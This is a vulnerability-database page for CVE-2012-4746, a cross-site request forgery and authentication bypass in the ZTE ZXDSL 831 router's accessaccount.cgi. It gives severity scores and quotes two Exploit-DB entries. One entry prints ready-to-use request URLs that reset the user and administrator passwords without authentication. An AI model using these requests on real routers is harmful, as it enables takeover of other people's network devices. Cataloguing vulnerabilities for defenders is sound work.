CVE-2012-4746
published 2012-08-31CVE-2012-4746: Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi in ZTE ZXDSL 831IIV7.5.0a_Z29_OV allows remote attackers to hijack the authentication of…
PriorityP432medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.09%
61.2th percentile
Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi in ZTE ZXDSL 831IIV7.5.0a_Z29_OV allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysPassword parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zte | zxdsl | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ZTE - Change Admin Password
exploitdb·2012-04-08
CVE-2012-4746 ZTE - Change Admin Password
ZTE - Change Admin Password
---
# Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
Exploit By Nuevo Asesino
##################################################################################################
password ======> 123456
Now you can get the username & the password------------------------------------------------------Contact :[email protected] : Https:\www.facebook.com\Want.Revenge
\|||/ .-.________ (o o) ________.-. -----/ \_)_______) +----------oooO------------+ (_______(_/ \------ ( ()___) The Blacke Devils (___() ) ()__) (__() ----\___()_) Algeria Warriors (_()___/----- +-------------Oo
Exploit-DB
ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities
exploitdb·2011-11-01
CVE-2012-4746 ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities
ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities
---
# Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities
# Date: 28 / 10 / 2011 .
# Authors: Mehdi Boukazoula ; Ibrahim Debeche .
# Software Link with patch :
# Version: v 831IIV7.5.0a_Z29_OV
# Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !!
# Description :
1 - Authentication bypass + Cross Site Request forgery
To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator :
USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111
No writeups or analysis indexed.
2012-08-31
Published